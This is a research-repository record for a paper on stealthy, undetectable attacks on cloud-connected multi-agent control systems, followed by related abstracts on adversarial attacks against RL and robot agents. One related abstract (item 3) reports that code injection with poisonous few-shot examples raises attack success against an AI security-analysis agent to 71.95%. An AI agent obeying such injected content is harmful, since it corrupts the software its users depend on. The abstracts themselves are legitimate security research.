skip to main content
US FlagAn official website of the United States government
dot gov icon
Official websites use .gov
A .gov website belongs to an official government organization in the United States.
https lock icon
Secure .gov websites use HTTPS
A lock ( lock ) or https:// means you've safely connected to the .gov website. Share sensitive information only on official, secure websites.


Title: Stealthy Attacks in Cloud-Connected Linear Impulsive Systems
This paper studies a security problem for a class cloud-connected multi-agent systems, where autonomous agents coordinate via a combination of short-range ad-hoc communication links and long-range cloud services. We consider a simplified model for the dynamics of a cloud-connected multi-agent system and attacks, where the states evolve according to linear time-invariant impulsive dynamics, and attacks are modeled as exogenous inputs designed by an omniscent attacker that alters the continuous and impulsive updates. We propose a definition of attack detectability, characterize the existence of stealthy attacks as a function of the system parameters and attack properties, and design a family of undetectable attacks. We illustrate our results on a cloud-based surveillance example.  more » « less
Award ID(s):
1710621
PAR ID:
10094186
Author(s) / Creator(s):
; ; ; ;
Date Published:
Journal Name:
American Control Conference
Page Range / eLocation ID:
146 to 152
Format(s):
Medium: X
Sponsoring Org:
National Science Foundation
More Like this
  1. In offline multi-agent reinforcement learning (MARL), agents estimate policies from a given dataset. We study reward-poisoning attacks in this setting where an exogenous attacker modifies the rewards in the dataset before the agents see the dataset. The attacker wants to guide each agent into a nefarious target policy while minimizing the Lp norm of the reward modification. Unlike attacks on single-agent RL, we show that the attacker can install the target policy as a Markov Perfect Dominant Strategy Equilibrium (MPDSE), which rational agents are guaranteed to follow. This attack can be significantly cheaper than separate single-agent attacks. We show that the attack works on various MARL agents including uncertainty-aware learners, and we exhibit linear programs to efficiently solve the attack problem. We also study the relationship between the structure of the datasets and the minimal attack cost. Our work paves the way for studying defense in offline MARL. 
    more » « less
  2. In this paper, we study a security problem for attack detection in a class of cyber-physical systems consisting of discrete computerized components interacting with continuous agents. We consider an attacker that may inject recurring signals on both the physical dynamics of the agents and the discrete interactions. We model these attacks as additive unknown inputs with appropriate input signatures and timing characteristics. Using hybrid systems modeling tools, we design a novel hybrid attack monitor and, under reasonable assumptions, show that it is able to detect the considered class of recurrent attacks. Finally, we illustrate the general hybrid attack monitor using a specific finite time convergent observer and show its effectiveness on a simplified model of a cloud-connected network of autonomous vehicles. 
    more » « less
  3. Agentic AI and Multi-Agent Systems are poised to dominate industry and society imminently. Powered by goal- driven autonomy, they represent a powerful form of generative AI, marking a transition from reactive content generation into proactive multitasking capabilities. As an exemplar, we propose an architecture of a multi-agent system for the implementation phase of the software engineering process. We also present a comprehensive threat model for the proposed system. We demon- strate that while such systems can generate code quite accurately, they are vulnerable to attacks, including code injection. Due to their autonomous design and lack of humans in the loop, these systems cannot identify and respond to attacks by themselves. This paper analyzes the vulnerability of multi-agent systems and concludes that the coder-reviewer-tester architecture is more resilient than both the coder and coder-tester architectures, but is less efficient at writing code. We find that by adding a security analysis agent, we mitigate the loss in efficiency while achieving even better resiliency. We conclude by demonstrating that the security analysis agent is vulnerable to advanced code injection attacks, showing that embedding poisonous few-shot examples in the injected code can increase the attack success rate from 0% to 71.95%. 
    more » « less
  4. null (Ed.)
    Robustness of Deep Reinforcement Learning (DRL) algorithms towards adversarial attacks in real world applications such as those deployed in cyber-physical systems (CPS) are of increasing concern. Numerous studies have investigated the mechanisms of attacks on the RL agent's state space. Nonetheless, attacks on the RL agent's action space (corresponding to actuators in engineering systems) are equally perverse, but such attacks are relatively less studied in the ML literature. In this work, we first frame the problem as an optimization problem of minimizing the cumulative reward of an RL agent with decoupled constraints as the budget of attack. We propose the white-box Myopic Action Space (MAS) attack algorithm that distributes the attacks across the action space dimensions. Next, we reformulate the optimization problem above with the same objective function, but with a temporally coupled constraint on the attack budget to take into account the approximated dynamics of the agent. This leads to the white-box Look-ahead Action Space (LAS) attack algorithm that distributes the attacks across the action and temporal dimensions. Our results showed that using the same amount of resources, the LAS attack deteriorates the agent's performance significantly more than the MAS attack. This reveals the possibility that with limited resource, an adversary can utilize the agent's dynamics to malevolently craft attacks that causes the agent to fail. Additionally, we leverage these attack strategies as a possible tool to gain insights on the potential vulnerabilities of DRL agents. 
    more » « less
  5. The advent of autonomous mobile multi-robot systems has driven innovation in both the industrial and defense sectors. The integration of such systems in safety- and security- critical applications has raised concern over their resilience to attack. In this work, we investigate the security problem of a stealthy adversary masquerading as a properly functioning agent. We show that conventional multi-agent pathfinding solutions are vulnerable to these physical masquerade attacks. Furthermore, we provide a constraint-based formulation of multi-agent pathfinding that yields multi-agent plans that are provably resilient to physical masquerade attacks. This formalization leverages inter-agent observations to facilitate introspective monitoring to guarantee resilience. 
    more » « less